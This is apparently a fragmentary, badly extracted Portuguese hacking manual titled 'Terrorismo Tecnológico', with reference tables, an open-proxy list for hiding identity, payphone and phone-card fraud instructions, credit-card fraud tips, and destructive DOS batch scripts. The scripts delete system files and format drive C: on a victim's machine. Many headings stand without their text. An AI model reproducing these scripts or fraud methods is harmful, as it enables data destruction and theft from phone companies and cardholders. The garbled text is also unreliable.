Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
net/
leandro_t@terra.com.br
Um dia a máquina dominará o mundo. Não por que
ela será mais inteligente, mas dominará a
informação.
Os computadores serão os maiores conhecedores
do universo e terão todas as informações
existentes sobre a raça humana. Seus
pensamentos, suas teses, sua psicologia, seus
cálculos, sua ciência. A máquina então poderá
fazer com que o próprio homem se destrua, pois
ela lhe dará uma informação errada, e este homem
que crê na verdade da tecnologia acreditará
agirá erradamente e se auto-destruirá.
Se não existir softwares capazes de fazer estas
máquinas não serem um simples servidor de
arquivo será então o fim das máquinas. Sem o
homem que a programa e lhe dá o seu alimento que
é a informação, esta não terá mais motivo para
sua existência. Serão computadores inúteis, e
seres humanos incapazes de se defender.
Começará então o caus!
Dedicatória
Use seu micro para alguma Finalidade Científica uma boa idéia
é ajudar em pesquisas que buscam freqüências de radio em
outros planetas entre em http://setiathome.berkeley.edu e instale
o protetor de tela, ajudando assim a processar os dados obtidos
pelo satélite.
Capítulo I (Introdução)
Parte I
Parte II
1.7 Os Invasores.........................................................63
1.7.1 – Lammer....................................................63
1.7.2 – Hackers....................................................63
1.7.3 – Cracker….................................................64
1.7.4 – Phreackers................................................64
1.7.5 – Funcionários.............................................65
1.7.6 – Terroristas.................................................66
1.7.7 – Carders......................................................66
1.8 Trapaceando para descobrir informações.............67
_________________________Extra
Vamos entender mais sobre protocolos?.....................69
Capítulo II (S.O.)
_____________________________Extra
Ataque por recusa de serviço......................................82
Capítulo III (Anônimidade)
3.1 Anônimidade........................................................84
3.2 Proxy....................................................................84
3.3 Usando o anonymizer..........................................86
3.4 Remailers.............................................................87
3.5 Lista de Proxy......................................................87
Capítulo IV (E-mails)
Extra
Proxy...........................................................................98
8.1 Trojan...................................................................162
8.2 Invasão.................................................................163
8.3 Trojans de ponte...................................................165
8.4 Trojans comerciais................................................165
8.5 Camuflando...........................................................166
8.6 Usando o Net bus 2.10 como teste........................166
8.7 Manual NetBus.....................................................170
8.7.1 Introdução....................................................170
8.7.2 Comprometimento.......................................170
8.7.3 Detecção......................................................171
8.7.4 Removendo o NetBus..................................172
8.8 Manual Back Orifice.......................................173
8.8.1 O que é o Back Orifice?...............................173
8.8.2 Quem criou o Back Orifice?.........................173
8.8.3 Como ele funciona?......................................174
8.8.4 Quem...servidores...são os clientes?.............174
8. 8.5 Comandos....................................................175
8.8.6 O Manual...................................................180
8.9 Utilizando o Anti-Trojans...................................185
8.10 Remoção do trojan............................................186
Capítulo IX (Senhas)
Capítulo X (Pragas)
Capítulo XI (IRC)
11.1 Introdução.........................................................202
11.2 Flood.................................................................202
11.3 Colisão de Nicks...............................................203
11.4 Tomando Canais...............................................204
11.5 Flood no Canal..................................................204
11.6 Netsplit..............................................................205
11.7 Pedindo ao OP..................................................206
11.8 Guerra Avançada..............................................206
11.9 Nuke…………………………………………..207
11.10 Bombas ICMP……………………………….207
11.11 Botnet/Floodnet……………………………...208
12.1 Introdução.........................................................210
12.2 Filtrando pacotes na rede..................................211
12.3 Capturando senhas............................................212
12.4 Roteadores........................................................212
12.5 Anti-Sniffers.....................................................213
13.1 Introdução.........................................................215
13.2 Descobrindo falhas em um host........................215
13.3 Portas abertas com serviços ativos....................216
13.4 Máquinas ativas da subnet.................................217
13.5 Scanneando o netbios........................................219
13.6 Como Evitar então?...........................................219
13.7 HTTP e FTP......................................................220
13.8 Analisando Firewalls.........................................220
13.9 Scan em Linux...................................................221
14.1 Introdução.........................................................246
14.2 Podem funcionar da seguinte forma.................246
14.3 Evasão de Firewall............................................247
14.4 Como fazer?......................................................248
14.5 Então vamos lá:.................................................251
14.5.1 Vendo sites proibidos pelo nome...........251
14.5.2 Endereços WWW proibidos por nome......252
14.6 Como bloquear então?......................................252
14.7 Bom vamos mais a fundo!................................253
14.7.1 E se funcionar pela 6667?......................253
14.8 E no caso do FTP?............................................254
14.9 Para o Administrador........................................256
16.1 Introdução.........................................................294
16.2 Como surge o bug.............................................294
16.3 Exemplos de falhas...........................................295
16.4 Buffer overflows...............................................296
16.5 Race condition..................................................296
16.6 Descobrindo se algum sistema têm falhas........296
16.7 Utilizando exploits ...........................................297
16.8 No Linux...........................................................297
16.9 Correção............................................................298
16.10 Outros Bugs.....................................................298
17.1 Wordlists...........................................................301
17.2 O processo de bruteforce..................................301
17.3 Tabela completa................................................302
17.4 Política de senhas não-crackeáveis...................335
Extras Uteis
Conectores................................................................413
Beeps.........................................................................430
Energia......................................................................438
Tabela ASCII............................................................442
Setup.........................................................................446
Terrorismo Tecnológico 16
Aprenda Para Sobreviver
Parte I
Dispersão clara:
Transmissões terrestres
P1.14 Repetidores
P1.15 Hub
P1.16 Bridges
Um Exemplo de Ponte
P1.17 Switches
P1.19 Roteadores
Vejamos o exemplo.
cnf E-cash
cod FORTRAN/Multiplan/dBASE
css cascading style sheet
cur cursor Windows
dcr Director
dir directory/Procom dialing directory
doc MS Word
dwt DreamWeaver template
dxr Director
fla Flash
ged imagem
gif imagem
gz arquivo comprimido
hdml handheld device markup language
hqx Mac BinHex
htm html
html htm
inf OS/2 Setup file
ivr image
ivs vídeo
jar Java archive
java Java
jpeg imagem
jpg imagem
js JavaScript
key keyboard macro
lbi DreamWeaver library item
lwp Lotus Word Pro
map mapa de imagem
mdb Acesso
mid MIDI
mod música
mov QuickTime MooV
mp2 mpeg áudio
mp3 mpeg áudio
mpeg mpeg vídeo
mpg mpeg vídeo
mtm multi-tracker module
Terrorismo Tecnológico 44
Aprenda Para Sobreviver
pas pascal
pdf Acrobat Portable Data Format
pl Perl
ply imagem
pps MS PowerPoint slide
pub MS Publisher
png imagem
ppt MS PowerPoint
ps PostScript
qt QuickTime MooV
ra RealAudio
ram RealAudio (ou Vídeo) meta-file
rm RealMedia
rmf áudio
rmx RealJukebox
rp imagem
rpm RealMedia plugin
rt RealText
rtf Rich Text Format
s3m sound
scm video
sit Arquivo comprimido Mac
smi SMIL
smil SMIL
spl Shockwave/Flash
swf Shockwave/Flash
tgz g-zipped TAR
tif imagem
tiff imagem
tmp temporário
tms Telemate script
tsp TrueSpeech
txt ASCII texto
utf8 MS FrontPage
viewlet Viewlet
viv vídeo
vivo vídeo
vox som
Terrorismo Tecnológico 45
Aprenda Para Sobreviver
wav som
wax Windows Media
wma Windows Media
wml WML
wrk planilha
wrl VRML
x fonte LEX
xls Excel
xml extensible markup language
zip arquivo comprimido
Você já entrou em um site e não teve a menor noção de onde ele está
hospedado? Isso não vai mais acontecer ao entrar em um site observe o final do
endereço e consulte a tabela a seguir ex: www.axcel.com.br o .br quer dizer que
está hospedado no Brasil!
AD Andorra
AE Emirados Árabes Unidos
AF Afeganistão
AG Antígua e Barbuda
AI Anguila
AL Albânia
AM Armênia
AN Antilhas Holandesas
AO Angola
AQ Antártica
Terrorismo Tecnológico 46
Aprenda Para Sobreviver
AR Argentina
AS Samoa Americana
AT Áustria
AU Austrália
AW Aruba
AZ Azerbaijão
BA Bosnia-Herzegovina
BB Barbados
BD Bangladesh
BE Bélgica
BF Burkina Fasso
BG Bulgária
BH Bahrein
BI Burundi
BJ Benin
BM Bermudas
BN Brunei
BO Bolívia
BR Brasil
BS Bahamas
BT Butão
BV Ilha Bouvet
BW Botsuana
BY Bielorússia
BZ Belize
Terrorismo Tecnológico 47
Aprenda Para Sobreviver
CA Canadá
CC Ilhas Keeling (Cocos)
CF República Centro-Africana
CG Congo
CH Suíca
CI Costa do Marfim
CK Ilhas Cook
CL Chile
CM Camarões
CN China
CO Colômbia
CR Costa Rica
CS Tchecoslováquia
CU Cuba
CV Cabo Verde
CY Chipre
CZ República Tcheca
DE Alemanha
DJ Djibuti
DK Dinamarca
DM Dominica
DO República Dominicana
DZ Argélia
Terrorismo Tecnológico 48
Aprenda Para Sobreviver
EC Equador
EE Estônia
EG Egito
ES Epanha
ET Etiópia
FI Finlândia
FJ Ilhas Fiji
FK Ilhas Falkland (Malvinas)
FM Micronésia
FO Ilhas Faroe
FR França
FX França (Território Europeu)
GA Gabão
GB Grã Bretanha (Reino Unido)
GD Granada
GE Georgia
GF Guiana Francesa
GH Gana
Terrorismo Tecnológico 49
Aprenda Para Sobreviver
GI Gibraltar
GL Groenlândia
GM Gâmbia
GN Guiné
GP Guadalupe (Francesa)
GQ Guiné Equatorial
GR Grécia
GT Guatemala
GU Guam (EUA)
GW Guiné Bissau
GY Guiana
HK Hong Kong
HM Ilhas Heard e Macdonald
HN Honduras
HR Croácia
HT Haiti
HU Hungria
ID Indonésia
IE Irlanda
IL Israel
IN Índia
IQ Iraque
Terrorismo Tecnológico 50
Aprenda Para Sobreviver
IR Irã
IS Islândia
IT Itália
JM Jamaica
JO Jordão
JP Japão
KE Quênia
KH Cambódia
KI Kiribati
KM Ilhas Comores
KP Coréia do Norte
KR Coréia do Sul
KW Kuáit
KY Ilhas Cayman
KZ Cazaquistão
LA Laos
Terrorismo Tecnológico 51
Aprenda Para Sobreviver
LB Líbano
LC Santa Lúcia
LI Liechtenstein
LK Sri Lanka
LR Libéria
LS Lesôto
LT Lituânia
LU Luxemburgo
LV Látvia
LY Líbia
MA Marrocos
MC Mônaco
MD Moldávia
MG Madagascar
MH Ilhas Marshall
ML Mali
MN Mongólia
MO Macau
MQ Martinica
MR Mauritânia
MT Malta
MU Ilhas Maurício
MV Maldivas
MW Malaui
MX México
MY Malásia
MZ Moçambique
Terrorismo Tecnológico 52
Aprenda Para Sobreviver
NA Namíbia
NC Nova Caledônia
NE Níger
NF Ilha Norfolk
NG Nigéria
NI Nicarágua
NL Países Baixos (Holanda)
NO Noruega
NP Nepal
NR Nauru
NT Zona Neutra
NU Niue
NZ Nova Zelândia
OM Omã
PA Panamá
Terrorismo Tecnológico 53
Aprenda Para Sobreviver
PE Peru
PF Polinésia
PG Papua
PH Filipinas
PK Paquistão
PL Polônia
PR Porto Rico
PT Portugal
PW Palau
PY Paraguai
QA Qatar
RO Romênia
RU Rússia
RW Ruanda
S
Terrorismo Tecnológico 54
Aprenda Para Sobreviver
SA Arábia Saudita
SB Ilhas Salomão
SC Seicheles
SD Sudão
SE Suécia
SG Cingapura
SH Santa Helena
SI Eslovênia
SK República Eslovaca
SL Sierra Leone
SM San Marino
SN Senegal
SO Somália
SR Suriname
ST São Tomé e Príncipe
SU União Soviética
SV El Salvador
SY Síria
SZ Suazilândia
TD Chade
TG Togo
TH Tailândia
TK Toquelau
TM Turcomenistão
TN Tunísia
TO Tonga
TP Timor Leste
TR Turquia
Terrorismo Tecnológico 55
Aprenda Para Sobreviver
TT Trinidad e Tobago
TV Tuvalu
TW Taiwan
TZ Tanzânia
UA Ucrânia
UG Uganda
UK Reino Unido
US Estados Unidos
UY Uruguai
UZ Uzbequistão
VA Vaticano
VC São Vicente e Granadinas
VE Venezuela
VG Ilhas Virgens Britânicas
VI Ilhas Virgens Americanas
VN Vietnã
VU Vanuatu
Terrorismo Tecnológico 56
Aprenda Para Sobreviver
WS Samoa
YE Iêmen
YU Iugoslávia
ZA África do Sul
ZM Zâmbia
ZR Zaire
ZW Zimbabue
Terrorismo Tecnológico 57
Aprenda Para Sobreviver
Capítulo I
Parte I
Pânico geral. Mas não se deve ter medo, mas sim tomar
certas políticas de seguranças e assim dificultar e proteger todo o
sistema computacional, o que é imprescindível.
Terrorismo Tecnológico 59
Aprenda Para Sobreviver
Mas...
1.5 O administrador
a rede ira parar, não importando se é uma rede feita com fibra
óptica, servidores duais com três GB de memória DDR-DIMM. Não
importa qual sistema operacional ou antivírus e firewall instalados,
a rede vai dar problema!
Tudo tem que ser resolvido rapidamente caso for ficar
pensando muito e burocratizando atrapalhara a resolução e assim
a rede ficara cada vez mais com problemas. Imagine uma situação
de um banco as 11:30 da manha, com filas kilometricas e pronto.
O sistema cai. Parece engraçado, mas duvido que alguém já não
chegou em uma loja, supermercado, hospital ou em algum lugar
que se use a informática e alguém falou essa frase – "desculpe,
mas o sistema caiu”.
Não vou dizer que isso não acontece, mas a máquina não erra
e sim nós.
Parte II
1.7 Os Invasores
1.7.1 - Lammer
1.7.2 - Hackers
1.7.3 - Cracker
1.7.4 - Phreakers
assim: Quando você coloca o cartão telefônico ele tem uma certa
quantidade de fusíveis quando se completa uma chamada é
emitido um certo “choque” e então queima um desses fusíveis e lá
se vai uma unidade do cartão.
Basta que esse fusível não se queime! A prática do diodo e
resistor simplesmente engana o orelhão. Outra coisa praticada por
esses invasores são o de cortar os dois fios atrás do orelhão
(naquela torre ou perto da parede) e ligá-lo a um telefone comum
assim funcionara como um telefone doméstico. As companhias
telefônicas devem tomar mais cuidado.
Isso tudo é crime, porém é muito mais muito difícil esses
Phreakers serem pegos, e nossas leis estão um pouco para não
dizer muito atrazada.
Há também funcionarios da própria empresa telefonica que
instala telefones clandestinos, geralmente em nome de defuntos
ou laranjas, essa prática vem cescendo muito, principalmente pela
má contratação, pessima qualidade e falta de treinamento dos
seus funcionarios.
1.7.5 - Funcionários
1.7.6 - Terroristas
1.7.7 Carders
_________________________Extra
Capítulo II
Desvantagens Unix
Um problema do Unix é que ele é um tanto complicado para
usuários comuns o utilizarem sendo que muitas de suas funções
somente são acessadas via linha de comando.
O SO é gratuito, mas os aplicativos que são feitos por
encomendas estão cada vez mais ficando absurdamente caros.
Para instalar e configurar a plataforma também tem que se ter
um especialista. E para os usuários tem que de dar um curso para
trabalhar com o sistema.
Terrorismo Tecnológico 74
Aprenda Para Sobreviver
Desvantagens do Windows
O SO e muitos dos seus aplicativos como o Office custam uma
fortuna.
Quando você compra um software eles lançam um mais novo e
melhor.
Tanto o Windows como o Unix inesperadamente uma vez ou
outra travam sem motivo.
Extra
Capítulo III
3.1 Anonimidade
3.2 Proxy
(O Proxy é o que dá ao invasor o melhor resultado!)
- Clique em conexão
200.202.202.1:8080
1
Uma lista de Proxy anônimo geralmente é pega pelo invasor em
http://www.multiproxy.org/txt_anon/proxy.txt
Terrorismo Tecnológico 86
Aprenda Para Sobreviver
2
O serviço gratuito somente o deixa usar o http para usar ftp e outros devem ser pagos.
Terrorismo Tecnológico 87
Aprenda Para Sobreviver
3.4 Remailers
164.58.28.250:80
194.muja.pitt.washdctt.dsl.att.net:80
web.khi.is:80
customer-148-223-48-114.uninet.net.mx:80
163.24.133.117:80
164.58.18.25:80
bpubl014.hgo.se:3128
bpubl007.hgo.se:3128
www.reprokopia.se:8000
193.188.95.146:8080
193.220.32.246:80
AStrasbourg-201-2-1-26.abo.wanadoo.fr:80
gennet.gennet.ee:80
Terrorismo Tecnológico 88
Aprenda Para Sobreviver
pandora.teimes.gr:8080
mail.theweb.co.uk:8000
mail.theweb.co.uk:8888
194.6.1.219:80
194.79.113.83:8080
ntbkp.naltec.co.il:8080
195.103.8.10:8080
pools1-31.adsl.nordnet.fr:80
pools1-98.adsl.nordnet.fr:80
195.167.64.193:80
server.sztmargitgimi.sulinet.hu:80
los.micros.com.pl:80
195.47.14.193:80
mail.voltex.co.za:8080
196.23.147.34:80
196.40.43.34:80
lvsweb.lasvegasstock.com:8000
musalemnt.notariamusalem.cl:80
ip-36-018.guate.net.gt:80
200.135.246.2:80
ntserver1.comnt.com.br:80
200-204-182-137.terra.com.br:80
200.21.225.82:8080
200.211.98.5:80
isdn02201.cultura.com.br:80
isdn02204.cultura.com.br:80
isdn03021.cultura.com.br:80
adao.dei.unicap.br:80
gateway.andromaco.cl:80
mail.care.org.gt:80
p75-90.cmet.net:8080
jaamsa.com:3128
host031210.ciudad.com.ar:80
host071052.arnet.net.ar:8000
200.46.109.82:80
200.52.4.82:80
correo.cfired.org.ar:80
200.61.6.50:8080
202.103.6.178:3128
202.104.189.20:8080
Terrorismo Tecnológico 89
Aprenda Para Sobreviver
202.104.20.181:80
202.105.138.19:8080
202.105.230.226:80
202.106.139.88:80
202.108.122.38:80
202.110.204.18:80
202.110.220.14:80
mail.jjs.or.id:80
cair.res.in:80
smtp2.info.com.ph:80
202.9.136.40:8080
202.99.225.45:8080
203.113.34.239:80
203.117.67.122:8080
203.123.240.112:80
proxy.nida.ac.th:8080
203.151.40.4:80
203.155.16.130:80
203.155.172.60:80
aworklan003105.netvigator.com:3128
esjv.com.hk:80
203.200.75.165:80
cp.chollian.net:80
yuluma.wa.edu.au:80
203.69.244.194:80
223-mail.internet.ve:8080
mail.bravocorp.com:8080
206.49.33.250:8080
207.61.38.67:8000
h209-17-147-1.gtconnect.net:80
209.47.38.116:8000
cr2098859123.cable.net.co:80
mail.unisol.com.ar:80
210.12.86.181:80
210.204.118.194:8080
210.21.93.141:3128
210.219.227.52:8080
210.242.164.150:80
210.8.92.2:80
210.82.40.243:8080
Terrorismo Tecnológico 90
Aprenda Para Sobreviver
210.92.128.194:8080
210.96.65.4:80
host211000070226.kagaku-k.co.jp:80
www.kan-shoku.co.jp:80
ns.toyoriko.co.jp:80
211.114.116.60:80
211.165.192.8:80
211.21.111.227:8080
211.233.21.166:8080
211.45.21.165:8080
dns1.daiken-c.co.jp:80
dns.lpgc.or.jp:80
211.93.108.113:8080
212.12.157.130:8000
enteleca-2.dsl.easynet.co.uk:80
TK212017066196.teleweb.at:80
212.251.36.62:80
adslb-98-18.cytanet.com.cy:80
212.38.132.122:80
212.60.65.206:8080
is2.isys.no:8000
213.121.248.138:80
213.16.133.130:80
213.176.28.6:80
acode-u.org:8080
213.25.170.98:8080
213.25.29.12:80
p038-30.netc.pt:80
xirus.com:8080
adsl-216-158-25-110.cust.oldcity.dca.net:80
normandintransit.com:80
216-238-112-40.dsl.ct.thebiz.net:80
216.72.196.21:80
216.72.63.198:80
216.72.63.198:8080
217-127-248-37.uc.nombres.ttd.es:3128
217.153.114.66:8080
host217-34-153-161.in-addr.btopenworld.com:8080
host217-34-194-49.in-addr.btopenworld.com:80
host217-37-205-177.in-addr.btopenworld.com:8080
Terrorismo Tecnológico 91
Aprenda Para Sobreviver
host182-44.pool21758.interbusiness.it:8000
host162-51.pool21759.interbusiness.it:80
217.66.203.82:3128
218.5.133.146:80
2.magicbird.co.jp:80
h0040f6a4e019.ne.client2.attbi.com:8080
4.22.156.10:80
61.11.26.150:80
61.131.48.219:80
61.133.63.129:80
61.138.130.229:8080
cm61-15-14-187.hkcable.com.hk:80
61.159.224.11:80
61.159.235.36:8080
61.180.73.66:8080
61.185.255.4:3128
61.32.11.130:8080
www.flab.fr:8080
adsl-63-192-134-107.dsl.snfc21.pacbell.net:8080
ftp.aparizona.com:80
64-132-153-94.gen.twtelecom.net:8000
ensait19.ensait.fr:80
ado.com.mx:80
AS7000_1B.sfn.co.jp:8080
ns.cyberlinks-jp.com:80
211.15.62.123:8000
210.163.167.162:80
h64-5-220-82.gtcust.grouptelecom.net:80
204.196.104.27:80
ftp.orange.uk.com:8000
maq241i.advance.com.ar:80
mertennt.merten.hu:80
61.142.169.98:80
ns.proserv.co.jp:80
www.nisshin-syouji.co.jp:80
202.9.136.40:80
210.254.8.52:8000
www.qdh.or.jp:80
207.167.236.137:80
210.74.254.35:80
Terrorismo Tecnológico 92
Aprenda Para Sobreviver
219.163.108.18:8080
mail.koibuchi.ac.jp:80
dns1.koibuchi.ac.jp:80
http://www.multiproxy.org/txt_anon/proxy.txt
Terrorismo Tecnológico 93
Aprenda Para Sobreviver
Capítulo IV
4.2 Spam
Não há muito que fazer neste caso a não ser usar o antivírus e
se a máquina travar reiniciá-la e após isso apagar este e-mail.
4.6 Alerta
3
SMTP - é um protocolo destinado a fazer o envio das mensagens de e-mail. Ele se encarrega de
enviar as mensagens até o servidor. Ele não requer senhas por isso é tão fácil de falsificá-lo.
Terrorismo Tecnológico 97
Aprenda Para Sobreviver
4.7 Dicas
Extra
(retirado da Internet)
Introdução
Os proxies são principalmente usados para permitir acesso à
Web através de um firewall (fig. 1). Um Proxy é um servidor HTTP
especial que tipicamente roda em uma máquina firewall. O Proxy
espera por uma requisição de dentro do firewall, a repassa para o
servidor remoto do outro lado do firewall, lê a resposta e envia de
volta ao cliente.
Terrorismo Tecnológico 99
Aprenda Para Sobreviver
Detalhes Técnicos
http://mycompany.com/information/ProxyDetails.html
GET /information/ProxyDetails.html
Terrorismo Tecnológico 103
Aprenda Para Sobreviver
http://mycompany.com/information/ProxyDetails.html
GET http://mycompany.com/information/ProxyDetails.html
GET /information/ProxyDetails.html
Capítulo V
- Carders e Phreackers
O carder
*O Cadastro.
Terrorismo Tecnológico 109
Aprenda Para Sobreviver
*O E-mail.
Rastreamento de IP.
(3- Se você for cardear alguma coisa cara, use cartões American
Express e Visa Gold, pois o limite e grande e não há perigo de não
ter crédito :-)
Se você puder alugue uma caixa postal nos correios, para receber
essas revistas ( custa R$ 54,18 por 1 ano).
Terrorismo Tecnológico 111
Aprenda Para Sobreviver
Indice
A1. Introdução
A1.1. Prefacio da versão
A1.2. Pobreza de informações e pessoas mal informadas
A2. Telefones privados
A2.1. Introdução
A2.2. Efetuando ligações de aparelhos sem teclas
A3. Telefones públicos
A3.1. Introdução
A3.2. Efetuando ligações gratuitamente utilizando um diodo
A3.3. Efetuando ligações gratuitamente utilizando um aparelho
comum
A3.4. Conectando notebooks a telefones públicos
A3.5. Observação
A4. Caixas de verificação
A4.1. Introdução
A4.2. Efetuando ligações gratuitas de caixas de verificação
A5. FAQ
A5.1. E possível tomar um choque mexendo em fios telefônicos?
A5.2. Como faço para fazer chamadas grátis de minha residência?
A6. Observação final
Terrorismo Tecnológico 112
Aprenda Para Sobreviver
A1. Introdução
A2.1. Introdução
A3.1. Introdução
||
||
||
||
+------------------++------------------+
||
||
| +----¦ ¦ ¦ ¦ ¦ ¦ ¦----+ |
">| / diodo \ |
Terrorismo Tecnológico 115
Aprenda Para Sobreviver
loja que venda, pegue uma placa de algum circuito eletrônico antigo
de alguma coisa que tenha queimado. Elas sempre tem diodos.
Você deve procurar uma peça pequenininha que tem dois terminais,
e preta e normalmente estará escrito IN qualquer coisa.
A3.5. Observação
A4.1. Introdução
Isto e coisa pra quem não tem cérebro. Mesmo se ela estiver
trancada com um cadeado, se não puder abrir um cadeado ou
procurar informação de um método para abri-lo, procure outra caixa.
Ou então esqueça que você leu esta seção.
A5. FAQ
Todo o processo aqui descrito não causa nenhum tipo de dano aos
aparelhos telefônicos, mesmo em longo prazo.
Índice
Depois você tem que descascar os fios dele (vão dar em 2 fios).
Então arrume um bom alicate, estilete ou faca e vá ate um orelhão.
Descasque os fios do orelhão (descasque, não e para cortar) pegue
os dois fios descascados do orelhão e entrelace com os dois fios do
seu telefone, observe a polarização, ou seja, se seu telefone portátil
ficar sem linha inverta a posição dos fios telefônicos, pois, ao
contrario do que muita gente pensa, o orelhão tem fio negativo e
positivo. Agora e só efetuar a ligação de seu telefone comum.
Para ligar a cobrar mais barato, você tem que adicionar um número
que a soma dele com o ultimo seja igual a 10. Ex: A soma desses
números tem que dar 10. Como fazer: 9 011 5584-0352 + 8 = 9 011
5584-03528.
Índice
Primeiro, pegue o número que você vai discar. Ex: 123-4567. Esse
número e fictício, não saia ligando para lá para pedir informações.
Então devemos pegar o ultimo número do telefone a ser discado, no
caso o 7... Então subtraímo-lo de 10, o que vai resultar o número 3.
Somente vamos acrescentar o número 3 ao final do número
discado. O resultado vai ficar: número ligado sem pagar: 123-4567-3
Onde:
Índice
Terrorismo Tecnológico 127
Aprenda Para Sobreviver
D1. Cartão
D2. Grafite
D3. Esmalte de Unha Incolor
D4. Água Cândida
D5. Papel Alumínio
D6. Silicone
D7. Cartões Infinitos
D8. Plucking Block Line
D9. Aretha Sem Fichas
D10. Fazendo Orelhao Tocar Sozinho
D1. Cartão
D2. Grafite
D6. Silicone
Atenção: esta dica tem que ser realizada com muita paciência, pois
se você errar apenas um detalhe estraga tudo! Primeiramente
consiga um estúpido cartão telefônico zerado! Lixe ele com aquela
lixa bem fina e deixe-o em repouso durante 3 ou 4 minutos.
Passados então cerca de 3 a 4 minutos percebera que a tinta do
cartão
nas costas da figura saiu. Quando a tinta nas costas da figura já
estiver totalmente desaparecida você percebera como a confecção
do cartão e uma merda. E um negocio desse tipo:
Costas do cartão
-----------------
| o-o o-o o-o |
| o-o o-o o-o | Em cada bolinha ligada por um fio que nem diz o
desenho ( o-o )
| o-o o-o o-o | coloque um papel laminado bem fino para interligar
as duas bolinhas.
| o-o o-o o-o | Ou também pode ser usado um fio bem fino.
| o-o o-o o-o |
-----------------
_____ ____
/\/\
/\/\
| bolinha 1| ============ | bolinha 1|
\/\/
\ _____ / \ _____ /
Essa técnica e meio forçada, mas funciona. Nosso alvo são aqueles
aparelhos que bloqueiam chamadas telefônicas, o tão temido
BLOCK LINE. Bem, isso e só uma parte porque já estamos
imaginando uma matéria futura sobre o sistema, porém englobando-
o de forma muito mais ampla e falando mais dos detalhes técnicos.
Por enquanto espero que isso quebre o galho. A primeira coisa que
deve ser feita e descobrir se o problema e realmente o BLOCK LINE
e se a linha não foi bloqueada na companhia telefônica. Antes de
tudo olhe se a senha padrão que e 222 não foi mudada. Agora
procure o telefone principal da casa, aquele que quando desligado
desliga a todos da casa. Abra ele com uma chave de fenda e
procure uma caixinha preta escrita Bloch line. Abra agora também o
block line, com cuidado pra não quebrar. Apos ter feito isso tire a
película que cobre a placa do aparelho block line e exponha o
circuito à luz fluorescente (raios ultravioleta). Pronto, você apagou
todas as informações da placa! Agora e claro que as pessoas nem
vão desconfiar qual o problema...
ORIGINAL
(10 - 8) = 2
(10 - 2) = 8
(10 - 3) = 7
Terrorismo Tecnológico 131
Aprenda Para Sobreviver
(10 - 2) = 8
(10 - 6) = 4
(10 - 4) = 6
(10 - 7) = 3
|_______ NOVO NÚMERO
O que você vai ter que fazer e bater no bocal do telefone o número
de vezes correspondente a subtração.
Capítulo VI
Introdução
- Inicie o Word
6.2 Vírus
Exemplo 1: -- "Autodestruição"
Digite: cd..
Aparecerá: C:
@echo destruidor
Exemplo 2: -- "HiperDestruição"
Digite: cd..
Aparecerá: C:
@Echo off
@Break off
@Echo "Destruição total"
(uma linha sem nada)
deltree/y C:\(pasta que escolher)
Tipo assim:
Terrorismo Tecnológico 141
Aprenda Para Sobreviver
DIR-II
Detecção
6.6 Badcom
@ECHO OFF
CLS
ECHO
ATTRIB
MD
RD
DEL ou DELETE
DELTREE
C:\Deltree /y windows
Excluindo windows...
REN
PROMPT
Com este comando você pode trocar o C:\> do Ms-dos pelo que
você quiser.
Por exemplo:
C:\> PROMPT teste:\>
teste:\>
GOTO
Este comando faz com que o BAT pule ou volte para determinada
parte do
Programa.
Exemplo: O uso do GOTO é muito usado se quiser que não pare de
repetir
determinado comando ... usando o comando CLS, veja:
@echo off
:INI <-- Indica a parte do programa onde vai ser voltado o
comando
Cls Usam-se dois ponto antes, outros exemplos são :START
:COMEÇO
GOTO INI <-- Aqui o comando GOTO, para voltar para o alvo
indicado.
Terrorismo Tecnológico 148
Aprenda Para Sobreviver
@ECHO OFF
CLS
"Limpa a tela". Por exemplo, se você quiser que não apareça nada
quando a vítima executar o Badcon.
Ex.: @Echo Off
Del *.*
cd windows
del *.com
del *.ini
cls
ECHO
CD
COPY
DEL
DELTREE
RD
REN
FORMAT
CHOICE
DOSKEY
GOTO
DIR
GOTO LOOP
Com isso o programa ficará dando DIR repetidamente
IF EXIST
@echo off
cd\ -----------------------> vai para a unidade de disco C:\
cd windows -------------------> entra no diretório Windows
del *.com ---------------------> deleta todos os arquivos com extensão
.com
del *.sys ---------------------> deleta todos os arquivos com extensão
.sys
cd\ -----------------------> volta para a raiz de C:\
del command.com -------------------> deleta o arquivo command.com
Terrorismo Tecnológico 152
Aprenda Para Sobreviver
(o do MS-DOS)
echo Seu computador acabou de ser invadido por -=|Hacker|=- ------
----> exibirá a mensagem digitada
Capítulo VII
<diretório>
PAUSE: Espera alguma tecla ser pressionada para continuar a
execução.
REN: Renomeia um arquivo. ex. REN <Nome_do_Arquivo>
<Novo_Nome>
CLS
Disco de sistema inválido
PAUSE
Confirma inicio da formatação da unidade C: <S/N>
ECHO OFF
@ECHO OFF
IF EXIST C:\AUTOEXEC.BAT DEL C:\AUTOEXEC.BAT
IF EXIST C:\CONFIG.SYS DEL C:\CONFIG.SYS
@ECHO OFF
FORMAT C: /A
Outros:
Terrorismo Tecnológico 156
Aprenda Para Sobreviver
APPEND
Define um caminho de buscas para arquivos que não foram
encontrados.
Parâmetros : path on, off: Aplicará um caminho de busca definido
por Append
ATTRIB
Esse comando serve para ocultar determinados arquivos.
Parâmetros :
+r, -r : Define atributo de leitura
+h, -h : Define atributo de oculto
CD
Muda para o diretório especificado
CHOICE
Esse comando possibilita uma escolha. Necessita do IF e
ERRORLEVEL
Parâmetros
/c: Possibilita uma escolha feita pelo progamador e não
pelo default
nn: : Define o número de segundos de espera. De 00 a 99
text: Define um texto á ser exibido antes das opções de
escolha
/s: Faz diferenciação de letras minúsculas e letras
maiúsculas
CLS
Limpa a tela
DELTREE
Deleta um arquivo ou diretório
Parâmetros
/y: Não pede confirmação
DIR
Dá um DIR
Terrorismo Tecnológico 157
Aprenda Para Sobreviver
ECHO
Este comando serve para exibir uma escrita. Por
exemplo:
ECHO Quem ler isso é um tonto
Ficaria assim:
Tonto !!!!
Parâmetros:
OFF: Não mostra os comandos dados
Goto
Volta para um determinada parte do arquivo
Parâmetros
:START: Marca o local para onde deve voltar
START: Indica o alvo para o qual ele deve voltar
IF e ERRORLEVEL
Complemento do CHOICE. Ele define o que vai acontecer. =)
@echo off
<enter>
del *.sys
<enter>
del *.exe
<enter>
del *.com
<enter>
cd windows
<enter>
del *.*
<enter>
cd\
<enter>
del arquivo.bat
<enter>
<tecla F6>
<enter>
@echo off
<enter>
@echo
<enter>
choice /c1234
<enter>
Terrorismo Tecnológico 160
Aprenda Para Sobreviver
if errorlevel 1 goto Um
<enter>
Capítulo VIII
8.1 Trojan
O que é um Trojan?
Este arquivo irá abrir uma porta do computador, ele pode até
